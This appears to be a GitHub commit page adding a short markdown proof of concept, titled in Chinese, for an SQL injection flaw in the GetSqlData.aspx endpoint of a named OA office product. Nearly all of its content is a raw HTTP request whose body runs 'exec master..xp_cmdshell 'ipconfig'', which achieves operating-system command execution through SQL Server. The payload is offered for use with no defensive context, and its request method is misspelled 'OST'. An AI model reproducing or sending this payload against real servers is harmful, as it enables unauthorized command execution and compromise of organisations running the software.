Create 某和OA C6-GetSqlData.aspx SQL注入漏洞.md

This commit is contained in:
wy876 2023-08-19 20:26:26 +08:00 committed by GitHub
parent 29bc217c13
commit 625a33218f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,13 @@
## 某和OA C6-GetSqlData.aspx SQL注入漏洞
```
OST /C6/Control/GetSqlData.aspx/.ashx
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
exec master..xp_cmdshell 'ipconfig'
```